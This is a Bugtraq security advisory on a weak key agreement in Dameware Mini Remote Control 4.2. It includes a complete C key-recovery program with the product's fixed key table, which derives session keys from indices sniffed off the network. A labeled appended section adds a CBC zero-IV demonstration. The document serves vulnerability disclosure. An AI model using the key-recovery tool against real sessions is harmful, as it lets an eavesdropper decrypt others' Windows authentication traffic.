
List:       bugtraq
Subject:    Dameware Mini Remote Control Version 4.2  Weak Key Agreement Scheme
From:       ax09001h <ax09001h () hotmail ! com>
Date:       2004-04-30 18:26:46
Message-ID: 20040430182646.29912.qmail () www ! securityfocus ! com



Title: Dameware Mini Remote Control Version 4.2 – Weak Key Agreement Scheme

Versions: 	Dameware Mini Remote Control Version 4.2
		

Vulnerability: The latest version of Dameware's Mini Remote Control System uses a
weak key agreement scheme.  The scheme consists of the sharing of pointers into a
fixed key lookup table.  Both the client and the server have access to a key lookup
table (KLT) consisting of 1000 32-bit values.  Prior to encrypting traffic, the
server sends the client a series of 32-bit integers; call it the key index table
(KIT).  For the sake of description, let's call the indices klt_idx[4], an array of
4 32-bit integers.  The klt_idx are set as follows:

klt_idx[0] = KIT[100];
klt_idx[1] = KIT[4];
klt_idx[2] = 42;
klt_idx[3] = KIT[37];

The actual session key is then constructed as 4 32-bit integers, sk[4], as follows:

	sk[0] = KLT[klt_idx[0]];
	sk[1] = KLT[klt_idx[1]]; 
	sk[2] = KLT[klt_idx[2]];
	sk[3] = KLT[klt_idx[3]];

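This of course produces 0 bits of security: the KLT is fixed and present in both
the client and the server, and the KIT is sent by the server before encryption
begins, so anyone who sees the KIT can build the same sk.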

They proceed to correct the Electronic Code Book mode of encrypting other
authentication packets by using the key constructed above with Blowfish in cipher
block chaining mode with an IV = 0.

Exploit:

/*

	dwgenkey.c			dameware generate key program.

					this function mimics the dameware
					key generation algorithm used to 
					pass encrypted windows authentication 
					across between client and server
			

					ax09001h@hotmail.com


*/


#include <stdio.h>
#include <stdlib.h>


unsigned int	KLT [1000] = 
{
	0x75A50CF3, 0x58509D61, 0x2352671F, 0x1C8694B4, 0x464A5B8D, 0x17F76F5D,
	0xF7CBFF22, 0xDEE4BBE7, 0x87C577D7, 0x7DE79418, 0x63099A11, 0x7FB4509,
	0xF8AE103C, 0xB8956F47, 0xA788EF1E, 0xBC1B225E, 0x1F6F1B29,	0x48A20FA2, 
	0x73764E64, 0x9B1BAFE5, 0xC74859E3, 0xF34C3973, 0xD782E7EB,	0xBC2B83CD, 
	0x333141DD, 0x78F91C49, 0x8C3C3C62, 0x430F1CA6, 0xF55CB058,	0x5474C05, 
	0x2AD30B5F, 0x47B3AA97, 0xD1DE6ED1, 0x927DD4C0, 0x9043C47A,	0xCFA8D725, 
	0x8F2A794B, 0x916758FC, 0x5C21B4C0, 0xAF5D6F28, 0x2E5B2EE9, 0xA4772762, 
	0x5C35CBA8, 0x359EE4E1, 0xA778F423, 0xB4EB8D16,	0x846238D7, 0x9B9C7F88, 
	0x708517E4, 0x8346D4FA, 0xE131395B, 0xB95282FD,	0x5434DB89, 0x2B00247B, 
	0xAB5A14EC, 0x6A74879C, 0x1DF2EDE1, 0x9E9CBAD8,	0x6E4F97D5, 0x8910C7AE, 
	0x6C76CD48, 0x4C5C0FDE, 0x1C408E04, 0xB1DC5C7B,	0xB226FFC5, 0x5C1D1096, 
	0xA92D865A, 0x48D0FF4C, 0x87F9BF23, 0xF5E864C9,	0x80154A84, 0x38987089, 
	0xA4F0EE08, 0x1630ADB9, 0x99F564BD, 0x69394C04,	0xC790C3E5, 0xF0E9E87E, 
	0xB9F8AF1C, 0xF797E46C, 0x5F2F339D,	0xB792AB5F, 0x462050F7, 0xF922EDBD, 
	0xD8EC238B, 0xDE30DFB6, 0xCAE883E7, 0x77748FED, 0x681AB4C8, 0x1610F821, 
	0xAA69288,  0x88E41CCD, 0x81BEA8DB, 0x56236206, 0x3FF596A7, 0x7EB79B23, 
	0x2939A1A1, 0x59F56A53, 0x175ACD1D, 0x9D442B3E, 0xCB0D47E3, 0x81BD054E, 
	0xC5B5AED3, 0x420BFE41,	0xBA3446BE, 0x1F8AC66A, 0xB12D2A33, 0xD52EB9F3, 
	0xFD572127,	0x1ED5C98C, 0x891E0430, 0x263E5AC2, 0xFCEBC8D7, 0x84ACE5F7, 
	0x1093FA43,	0xFD07DD1D, 0xC4C91870, 0x1952527F, 0xF77D5A1B, 0xAA6E479B,
	0x26BBC409, 0x1B694B08, 0xAB1246FB, 0x413D0BB5, 0xAC6A46C9, 0x79217008,
	0x315A6C60, 0xA18609FB, 0x37C4221C, 0xD25D2622, 0x6CA0CC6F, 0x6E3A0EDC,
	0x9EA7C082, 0x8F22351D, 0xC58AEC76, 0x8A59BFEF, 0x98C5888F, 0x5EA76365,
	0x7E8B04D1, 0x44B5282D, 0x72547943, 0x6B49B88, 0xD8644EF3, 0x4DCA10BE,
	0x6666892F, 0xAC773084, 0x85A718BE, 0x9C648D4A, 0x3D6787F1, 0xED2DB263,
	0xCB0129DC, 0xAFB919E3, 0x2385872E, 0xE119C18F, 0x8F4ABB22,	0x7A153138, 
	0xF4537078, 0x7B535CE4, 0x17E50602, 0x86AF582E, 0xA96A418E,	0x2E464810, 
	0xEC0F2BF1, 0xD7500E84, 0xFB8248CB, 0xB6A0934D, 0x45A2F984, 0xDBB687C0, 
	0x4FADD405, 0x19E5677B, 0x327DAB10, 0x6E82DD9C, 0x28B99205, 0x627FB642, 
	0x13266166, 0xAC1D207E, 0x6757CB08, 0x75A551EE, 0xD8D440C7, 0xF9E198F7, 
	0xDCD6C5DD, 0x9E91F814, 0xD411C844, 0x7CD5073B, 0x711214E6, 0x419766DA, 
	0xE5209EFB, 0x1A4E0702, 0xD8B6C71, 	0xDA3EAE89, 0xA1A00078, 0xB55B5C3E, 
	0xE8EB204C, 0x9092BCB5, 0x753F8AA, 0x25DBC9DC, 0x75855E4, 0x5486F63D, 
	0xE21C3971, 0x206B068A, 0xAEF41F63, 0xD6C45A84, 0x55CA81BF, 0x245EE02E, 
	0x20A277EC, 0x2688325E, 0x5CC597BC, 0xC3C6D5, 0xE10FA336, 0x1E038ED1, 
	0xD017BAA1, 0x60F3B322, 0x5C4B7883, 0x37C8827F, 0xA4401AB8, 0x3F0D1244, 
	0x599287A9, 0x9FEBF317, 0x551B9574, 0x7B4490D6, 0x5167A51E, 0x75144C86, 
	0xB58FA84E, 0xC2EFCD51, 0x62B1B44C, 0xF20CB94C, 0xFB1C3022, 0x5D9FA80E, 
	0x9723B02E, 0x9BEB9BC0, 0x7D7D7D7C, 0xBBECAC8, 0xEE7C8FD6, 0x84E7032B, 
	0x983051AE, 0x69E077E1, 0x4215FF00, 0x941F1398, 0x899CE29, 0x34FD70CC, 
	0x151A4D02, 0x625EFD60, 0xCC9FC987, 0x5854F10C, 0xFDE6B36A, 0xE50E1F0, 
	0x7D1AC470, 0x75CF6430, 0x691B188E, 0x861F8385, 0x899781B9, 0x453BBB9, 
	0x33CCF322, 0x5BC03054, 0x1C8F4BCE, 0xB20EAD6C, 0x8FC48E15, 0xC650FD0C, 
	0x5F9D8872, 0xD100E234, 0xCEBB178A, 0x20F2529F, 0x912889F8, 0x58EDD3F6, 
	0x27F8EADA, 0xE501536D, 0xB8635884, 0x5525004, 0x9B6EBF24, 0x4E223C61, 
	0x67C61B28, 0xBC8D0315, 0x186A6C99, 0xDAD6D525, 0x1C412AD1, 0x86B268E4, 
	0x47B5AC03, 0x72506EEA, 0xCDF419F9, 0x9E062DB4, 0x236F81F7, 0xCF4BFFDF, 
	0xF38B27B8, 0x17A2E942, 0xBDF70DFD, 0xB3ED596B, 0xD24583F5, 0x7D25304E,
	0x209350C6, 0xD171038E, 0xA7F746D2, 0x4DD38415, 0x7F7FB4D9, 0x60F193B5,
	0xAF480C11, 0x23E73939, 0x77853419, 0x835D55CE, 0xBCA629D0, 0xCDDA82C9,
	0xC6EC6933, 0xFD779112, 0x3477605F, 0xD56B9610, 0xAAB266A6,	0xF53E8558, 
	0x61D7B1D6, 0x5C5ADCD4, 0x9C4C685B, 0x47D4C3FE, 0x956BB743, 0x7BEAB72C, 
	0xEE0CADD4, 0x844F5B3D, 0xF6B76242, 0x7A48638E, 0x7A9FCA83, 0x8C5CFCB8, 
	0xC5C0200F, 0x458E401B, 0xD0232077, 0x96EC41FB, 0x818E1178, 0xF039C809, 
	0xD2CBF2F3, 0xD710BBDF, 0xAF373B6F, 0xECFF5238, 0xA7A90C76, 0xB291F856, 
	0x76378535, 0x8AC59C93, 0xCC083868, 0x10B3DCBD, 0x726A72D1, 0xCAA8BABB, 
	0x9C519F9B, 0xE57B91C2, 0x3938CA06, 0x8AB0A001, 0x81154FB1, 0xB8B999D9, 
	0xB385C69F, 0xF62E1A24, 0xE352A419, 0x52719D67, 0x23D0D6E4, 0xD143E405, 
	0x17D114A3, 0x7A590816, 0x4FB4C683, 0x96DE0346, 0x1C96B2B3, 0xE0FE73B, 
	0x51FA1A82, 0xB5A325A9,	0x7244452E, 0x88411A62, 0x10F37E47, 0x80E9235D, 
	0x8734E043, 0x7287A203, 0x7D322B79, 0x59F16B1A, 0xB715C112, 0x7F930942, 
	0xE31AF1D4, 0xC8312072, 0xB949A15E, 0xE5A0942A, 0x21C62B9F, 0x3A8E4A04, 
	0xA7B50B0A, 0xC7481BF1, 0xF1E2DB36, 0x8120EAAB, 0x9364D482, 0x481D5B4D, 
	0x58460CE7, 0x6E1FE474, 0xCB180DE1, 0xF1FEA961, 0x6E663723, 0x7F713621, 
	0xC421154,  0x14B18B19, 0xEB87F422, 0xE2100D60, 0x65ACBC65, 0xC1EA51EA,
	0x9DD0DF6A, 0x9AE68741, 0x1F5DEFA2, 0xA530969B, 0xB746D9D5, 0x1339A116,
	0x7C07054,  0xE118D5CE, 0xF13EE7DA, 0xA53EBE1E, 0x3864BC9,  0x27C3B146,
	0xF2057DFD, 0x5CDF8621, 0x24BBFA19, 0x9C207686, 0xFDA8C0B4, 0x7BC12DE,
	0x3B6E6ABD, 0xEE88CB8E, 0xF11F5F31, 0x17C36F90, 0x62545D14, 0x23BAA683,
	0xBCF05635, 0xEE710A20, 0x88D5C4C1, 0x45D242BC, 0x2618DAFA, 0x71C24008,
	0xEFF1F3E8, 0x90537430, 0xF941923C, 0xE806B643, 0x1E8F4C81,	0x98E93630, 
	0x90ECFFE3, 0x422C75E1, 0xA19D77D3, 0x99D16114, 0xCA4380C8,	0xAF2A72E8, 
	0x71114704, 0x97EBE3E0, 0x90D614F6, 0xF5408B6D, 0x841EE866, 0x35699601, 
	0x9C004E8F, 0x5ACAC96F, 0xF1D181D3, 0xB1DB1F66, 0xAD36B6E6,	0xA3C182A3, 
	0x6E159D3A, 0x4860F191, 0xA22499C0, 0xA8DD59AB,	0x5E729975, 0x5285CEC2, 
	0xF0505102, 0x87294945, 0x17EE75CA, 0xD5E97597,	0xC36CD9A,  0xA45A497, 
	0xA1215DDF, 0x41C84062, 0xC1C6536E, 0xE8AEF5BF,	0xBF109C2E, 0x402A1D1C, 
	0x67DEDD8,  0x97061C4A, 0x936BACD0, 0xC34A5C19,	0xF40F90FE, 0xD7B03D1, 
	0xD7C91313, 0xE03CF91D, 0x7176F3D4, 0x29440055, 0xBBB3A31C, 0x70F5A3C2, 
	0x76E7D2A6, 0x536501F,  0xC77CA12B,	0x5E6E2842, 0x9896F26C, 0x2BC45D27, 
	0xE2FF89C7, 0x11FBC8C,  0x252652BD,	0x61AA26A4, 0xF3DF28A,  0xAFB90C39, 
	0x3C5BCF12, 0xE765B3A5, 0x6EBF07FE,	0x2630C3A2, 0xC0F995BC, 0x27677058, 
	0x49E5FA9C, 0x3B66C518, 0x7654283D,	0xB8305341, 0x72E94CF,  0x3E181088, 
	0x9F721122, 0xC536D545, 0x8BD48FE7,	0xA0899C0F, 0x950D4B9C, 0xCDFA8F86, 
	0x9D1180B5, 0xB35F2925, 0x85CA36ED, 0x9FA58055, 0xEF0F31F9, 0xA5FADD9C, 
	0x2ABB9F51, 0xC90E060A,	0xA0304ED8, 0xB6462678, 0x5ECAB5CB, 0x9BFA4C0C, 
	0x1644830E, 0xC210F8D0,	0x3139A59B, 0xDE090D20, 0x89960C79, 0x489E6E7D, 
	0xC3650D3F, 0x832E301C,	0x3EC2DEC2, 0x8C1BEFD2, 0x15374CE3, 0xA95682A4, 
	0x694B8053, 0x8C003F9E,	0x3C792799, 0xC31B2A4B, 0xFD6F5781, 0x544F000B, 
	0x151F60A6, 0x224E32E5,	0x9AD498E6, 0x8B74BFCC, 0x85C8C5DA, 0x221D7990, 
	0x66C4A629, 0x1281D60A,	0xE0178028, 0x44E6DEBD, 0xBAAB265,  0x384C4B56, 
	0xDC2F9A2C, 0x470211A4,	0xCBD167C3, 0xF5EED383, 0x1E1ED189, 0x29D803F9, 
	0xC144F12E,	0x9AC2B5AB, 0xC3DB04A2, 0xC513EB91, 0x71DCF85C, 0x343B65E3, 
	0x6B32E419,	0xAFFC770D, 0xBCE86B4D, 0x9AA723E4, 0x611A0E70, 0xFA441603,
	0x3171887D, 0x5AC8ABCD, 0x45A5A2E4, 0xA47AFB05, 0xF1FBA2F1, 0x1F7FA634,
	0x95F72F6A, 0x17E27035, 0xC91082D7, 0x5F2BEE2F, 0x68EE3EA8, 0xD2238F52,
	0xD622F757, 0x2CE5FE15, 0x4DD2E862, 0xD8B78679, 0xA068E1E3,	0x9DA3764, 
	0xA46DC043, 0xEF5A319E, 0x3CA47D7,  0x15D66FBD, 0x70FD11C5,	0xEB93FAE7,
	0xE0C76863, 0xCA8DB56B, 0x549B7A6D, 0x7830B60E,	0x63EC6EA1, 0xC5F8C700,
	0x25F6631D, 0x81C74AA6, 0x1FEBAAA6, 0x50FACED0,	0xF3B16C0C, 0x42D24E7D,
	0x87FAB7B4, 0x8998222D, 0xCF13B716, 0xD77799C7,	0xF19B6249, 0xCC56A6E6,
	0x3D87AC7E, 0x2A73259B, 0x5503BDFD, 0xD95F05F1,	0xC01BCD8B, 0x6F9C96E2,
	0x6B2D997,  0xB3F54B81, 0x3139AC71, 0x504DC220,	0x9D4C8848, 0xFAB47FBF, 
	0xF910278A, 0x1AAD13D7, 0x667DC201, 0x2A2AE786,	0x845C31FA, 0x27F4E75, 
	0x413D1796, 0x9236D7BC, 0x8FAC3425, 0x866DC291,	0x97796BE4, 0x3581CDF, 
	0xA313B372, 0x57907BA0, 0x981BE778, 0x67DA3DF6,	0x947D9EC1, 0xCFA65CA6,
	0x6261BF74, 0xD818DCB0, 0x30CBA2D1, 0x1A41B299,	0x33317112, 0x424A6EB6,
	0x516FA0C5, 0x1B0EBEDC, 0xDDAB9664, 0xCBDE0912,	0x8E567CFA, 0xA1C9DAEB,
	0x1C7DB358, 0xA144F1FE, 0x2B7FEE15, 0xB5CA6B77,	0x2B1655B3, 0xFF3D846B,
	0x2B0B907A, 0xC0948E5C, 0x608A1725, 0x2FF6781C,	0x555C1AAC, 0xDB70AD3E,
	0xDFD488CA, 0x2170C025, 0x576C15E7, 0x5F447947,	0x30B8108F, 0xBB9ADE84,
	0x8808C71A, 0xB760EA1F, 0x4E503018, 0x534BA5B5,	0xCDF5FE07, 0xEC48167F,
	0xD1E7227A, 0xCD998A1,  0xE754F192,	0x2727BFFF, 0xBFB0694D, 0xF454B618, 
	0x63EBFF6,	0x30BD09D0, 0x927F98B2,	0x6F96ED41, 0xC249BFB1, 0x8E07ED96, 
	0x6D3B63AE, 0xC661C79A, 0x574D1947,	0x691AC06A, 0x1241A695, 0xDA814574, 
	0xF520C090, 0x7AAFF6DF, 0x6314F55A,	0x99BF992E, 0x4C2350AA, 0x16C970F2, 
	0xBC5DAF3D, 0x948FEE79, 0xCF038D84,	0x94916A6F, 0x67C9C446, 0x769D41FC, 
	0x7AB8FC6B, 0xAC88CDC6, 0x2632E0F2,	0x7A39D045, 0xE07D60C3, 0x627F0F1B, 
	0x6C9E9B6F, 0x5443B96A, 0xB42AEFB6,	0x7D971F39, 0x1E543216, 0xAB1F0A, 
	0x4B0E8966, 0xBE389C53, 0xE8143B78,	0x845EEA38, 0x1BC4E0C1, 0xC33854ED, 
	0xEBE30DBC, 0xAE0FFAD8,	0x545B28DB, 0x64CB5928, 0x516227C9, 0xDA7DED1B, 
	0x60957017, 0xEF42F6C4,	0xD1D44B1A, 0x6E9DCDB0, 0x8089B1C8, 0x78229E35, 
	0xE65C19DF, 0xBE4926F8,	0x22F282DB, 0x1DAD0725, 0x1F1E94A5, 0xE1F97ACD, 
	0x7EA0006F, 0x94F6FBDD,	0x26214BED, 0xFC7FF0CC, 0xA2393542, 0xB472E61E, 
	0x301E470,  0x36FD7EE5,	0xF179CB04, 0x18CC9785, 0x2E0F60B2, 0x13112B9B, 
	0x21CE96F9, 0xCF50766C,	0x420F7FBE, 0x3062489,  0xA2E5956D, 0x38AF92C9, 
	0x826DB438, 0xCA1D08C7,	0x2CAA1940, 0xCCCDF1C,  0x9C3FE51D, 0x1ECDC7D8, 
	0x909C80DE, 0x646BFFA9,	0x6318213D, 0x32C14EFF, 0xC8351460, 0x6D81B09, 
	0xC3BA2047, 0x4078D5B1,	0x7AF40C50, 0x7128296,  0xB57DE4BE, 0xBD35598, 
	0x2256C607, 0xB6177952,	0xF276EF63, 0x55D787AF, 0x2267BE3B, 0x48B1B069, 
	0x5CF704D4, 0x4C1B3376,	0xDF687016, 0x68B38FE2, 0x19E808B4, 0x2FFF302B, 
	0x78BD0181, 0xBC4A03F0,	0x98562262, 0xB9797F02, 0x1E7B17D3, 0x61B031D1, 
	0x8E69A1F8, 0x32863D7E,	0x8140AA57, 0xD42FB27E, 0x825645B2, 0x7E0AC685, 
	0x1752B306, 0xEF07F2F7,	0xF031981C, 0xA061064D, 0xE118F8AB, 0xCCE37EF9, 
	0x6AEBFCF7,	0xEEED8568, 0x98A86406, 0x6B7D3AAA, 0xAD068483, 0x2E71AAF2, 
	0x1800DB2E,	0xA98F5949, 0xE111A890, 0x17E02EB3, 0xC6B72970, 0x15067E3E,
	0xB2291D61, 0x6008098F, 0xDAD360FF, 0xD19E95D,  0xBEFD0EC7,	0x5F4C9183,
	0xCB5EAB77, 0xC6A1FB76, 0xD71F95D2, 0xFC7FDB6E,	0x80DD91AB, 0x8E322B21,
	0xAAE68069, 0xC2CEB8A5, 0xC89D1CA1,	0x931577D8, 0x4D6F1725, 0xC3E0EC5A, 
	0x7F94E8FB, 0x3E008B9C, 0x1DC1680D,	0xF99F3782, 0xFD54CD8F, 0x97722074, 
	0xE0F06DB7, 0xF9B44EE8,	0xFBF70D53, 0xDF3B605F, 0xB6CDC64D, 0xD5CC9449, 
	0x75A2DC1A,	0x62C4D3AE, 0x6FB02ED3, 0x55F97BF8, 0x86179194, 0x67488E2, 
	0x1071C487,	0x5D196F3C, 0x9FCDBA5E, 0x994036B,  0x538C2B87, 0xE3CA84F4, 
	0xE6D29642,	0xAA8E0B45, 0xF3557176, 0x403E0041, 0xF1056A7D, 0xB163CC68,
	0xB00F9A47, 0x6E13B87,  0x93C25E4F, 0x4BFCEC42, 0xD4AAE81,  0x9FA016C,
	0x8A842986, 0xDC301A3B, 0xA43D96F1, 0x1DFB9302, 0x4D9F9AAE, 0x6A7416FF,
	0xCF2E7C59, 0x76478C25, 0xAD4A317E, 0x8985000D, 0x38FED22B, 0xFD0944A9,
	0xD2A319D1, 0x9D9ABC55, 0x2A1F76B0, 0x9BCDAA0D, 0x2DE5847,  0xDF44583C,
	0xF4CEBE0F, 0x6733F2CD, 0x5F8A8DA5, 0x4526D975, 0xB6E458B7, 0x4D2BB1A6,
	0x137AA2C6, 0x6DDCFC23, 0xA41CE8B6, 0x4A442E7E, 0xFB7A0A5,  0xF7808F43,
	0x5D10DDD6, 0xA52D6396, 0x61574048, 0x8923CBA2, 0x6436DD12, 0x49266343,
	0xF1787AAB, 0xC467FB1A, 0x25278A4B, 0x2181A43C, 0xC4EAF160,	0x88A9E6BB, 
	0xC7AF0933, 0x8002BA84, 0xB134654,	0x4A015A8E, 0xEC16E6AF,	0xEC154BE3, 
	0x10FE786A, 0x8F5EA3E7, 0x1A92D7C4, 0xD90FE65A, 0x6CF77EA3,	0x394EB8F9, 
	0x573B2AF9, 0xD6396AFA, 0xCC79F56,	0xC36AA7DB, 0x88B6126E,	0x3BBD5F44, 
	0xA8086DC7, 0x9437E86F, 0xA8A72E5F, 0x204CC584, 0x508AAC96,	0xEACC6EF1, 
	0x981E7A1A, 0xA16DF863, 0xAA9FD0B9, 0x22F6D8DA,	0xA05A7581, 0xD9782911, 
	0xCCBDFFD7, 0x7E3C9F4E, 0x96FC6F3D,	0x7113F1FC, 0xD312E7BD, 0x6AD91B0F, 
	0x394E21FA, 0x47F135EE, 0xA24E4FE5,	0x2C7A682E, 0x185161A9, 0x6AF00259, 
	0xD411424D, 0xB207A9E1, 0xF4E482E7,	0x6173F9FE, 0xE3CEC249, 0xB63D392B, 
	0x3FE5BEDF, 0x82C2E736, 0x69FF3BA2,	0x9D219633, 0x8DA0F96F, 0xDFCCCB9, 
	0xC4A6A06F, 0xBC536DF7, 0xE76CC1F,	0x452F4BD1, 0x1BC9BA19, 0x4427617C, 
	0x4410511D, 0xD2B3643B, 0x90066BE6,	0x9B03705C, 0xF144AE,	0x5017F6E5, 
	0x2EC8DA0,	0xC4733AAE, 0xD2CB991D,	0xFF695547, 0xE662D331, 0xA374917C, 
	0xB53B62CC, 0xBF135D1,	0x3240CEBA, 0xB406298B, 0x5065FE42, 0x9BB538CC, 
	0xC89AF46A, 0x97FB692D,	0xB0123130, 0xED5BFFB1, 0x2CC09D9,	0x68E4E060, 
	0xB117D6E7, 0xBA9CE7B3,	0xB731559B, 0x876FF1D
};

int		usage()
{
	printf("USAGE: dwgenkey INDEX0 INDEX1 INDEX2\n");
	printf("\t INDEX0 is the hexadecimal value of 101st unsigned int\n");
	printf("\t        in the server to client message that precedes\n");
	printf("\t        the encrypted windows authentication packets\n");
	printf("\t INDEX1 is the hexadecimal value of 5th unsigned int\n");
	printf("\t        in the server to client message that precedes\n");
	printf("\t        the encrypted windows authentication packets\n");
	printf("\t INDEX2 is the hexadecimal value of 38th unsigned int\n");
	printf("\t        in the server to client message that precedes\n");
	printf("\t        the encrypted windows authentication packets\n");
	printf("OUTPUT: dameware encryption key\n");
	return 0;
}

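int main(int argc, char **argv)
{
	int			i;
	unsigned int	sk[4], klt_idx[4];


	if(argc!=4)	{	return usage();	}
	/* indices are unsigned, so parse them with strtoul rather than strtol */
	klt_idx[0] = (unsigned int)strtoul(argv[1], NULL, 16);
	klt_idx[1] = (unsigned int)strtoul(argv[2], NULL, 16);
	klt_idx[2] = 42;
	klt_idx[3] = (unsigned int)strtoul(argv[3], NULL, 16);

	/* refuse indices outside the 1000-entry table instead of reading past it */
	for(i=0;i<4;i++){
		if(klt_idx[i] >= 1000){
			fprintf(stderr, "index %d (0x%X) is outside the key lookup table\n", i, klt_idx[i]);
			return 1;
		}
	}

	/* the session key is simply the four table entries the indices point at */
	for(i=0;i<4;i++){
		sk[i] = KLT[klt_idx[i]];
		printf("%08X ", sk[i]);
	}
	printf("\n");

	return 0;
}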

Recommendation:  The general recommendation is to use another software package.  This
program seems to be riddled with poor software practices and a lack of understanding
of security principles.
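
On the "cipher block chaining mode with an IV = 0" point above: the following is an added example, not part of the original post and not Dameware code. It shows that CBC with a constant IV is deterministic, so two messages that begin with the same blocks produce the same leading ciphertext blocks. XTEA stands in for Blowfish (an assumption, so that no crypto library is needed), and the key, messages and IVs are constructed sample values.

```c
#include <stdint.h>
#include <stdio.h>

/* XTEA (64-bit block, 128-bit key) is a stand-in for Blowfish here; the CBC
   behaviour being shown does not depend on which block cipher is used. */
static void xtea_encrypt(uint32_t v[2], const uint32_t k[4]) {
    uint32_t v0 = v[0], v1 = v[1], sum = 0;
    for (int i = 0; i < 32; i++) {
        v0 += (((v1 << 4) ^ (v1 >> 5)) + v1) ^ (sum + k[sum & 3]);
        sum += 0x9E3779B9u;
        v1 += (((v0 << 4) ^ (v0 >> 5)) + v0) ^ (sum + k[(sum >> 11) & 3]);
    }
    v[0] = v0; v[1] = v1;
}
/* CBC: XOR each plaintext block with the previous ciphertext block
   (the IV for the first block), then encrypt. */
static void cbc_encrypt(const uint32_t key[4], const uint32_t iv[2],
                        const uint32_t *pt, uint32_t *ct, int nblocks) {
    uint32_t prev[2] = { iv[0], iv[1] };
    for (int b = 0; b < nblocks; b++) {
        uint32_t blk[2] = { pt[2*b] ^ prev[0], pt[2*b+1] ^ prev[1] };
        xtea_encrypt(blk, key);
        ct[2*b]   = prev[0] = blk[0];
        ct[2*b+1] = prev[1] = blk[1];
    }
}
#define NBLOCKS 3
/* Constructed sample data: two messages that share their first two blocks
   and differ only in the third. */
static const uint32_t KEY[4] = { 0x01234567, 0x89ABCDEF, 0xFEDCBA98, 0x76543210 };
static const uint32_t MSG_A[6] = { 0x444F4D5C, 0x61646D69, 0x6E000000, 0, 0x11111111, 0x22222222 };
static const uint32_t MSG_B[6] = { 0x444F4D5C, 0x61646D69, 0x6E000000, 0, 0x33333333, 0x44444444 };
static const uint32_t IV_ZERO[2] = { 0, 0 };
static const uint32_t IV_1[2] = { 0xA5A5A5A5, 0x0F0F0F0F }; /* stand-ins for  */
static const uint32_t IV_2[2] = { 0x5A5A5A5A, 0xF0F0F0F0 }; /* per-message IVs */

/* Number of leading ciphertext blocks that are identical for MSG_A and MSG_B. */
static int matching_prefix_blocks(const uint32_t iv_a[2], const uint32_t iv_b[2]) {
    uint32_t ca[6], cb[6];
    int n = 0;
    cbc_encrypt(KEY, iv_a, MSG_A, ca, NBLOCKS);
    cbc_encrypt(KEY, iv_b, MSG_B, cb, NBLOCKS);
    while (n < NBLOCKS && ca[2*n] == cb[2*n] && ca[2*n+1] == cb[2*n+1]) n++;
    return n;
}
int main(void) {
    printf("IV = 0 both times: %d matching blocks\n", matching_prefix_blocks(IV_ZERO, IV_ZERO));
    printf("distinct IVs:      %d matching blocks\n", matching_prefix_blocks(IV_1, IV_2));
    return 0;
}
```

With IV = 0 the two shared plaintext blocks encrypt identically; with a fresh IV per message no ciphertext block repeats. A fresh IV only removes this repetition and does nothing about the key agreement weakness described in the post.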

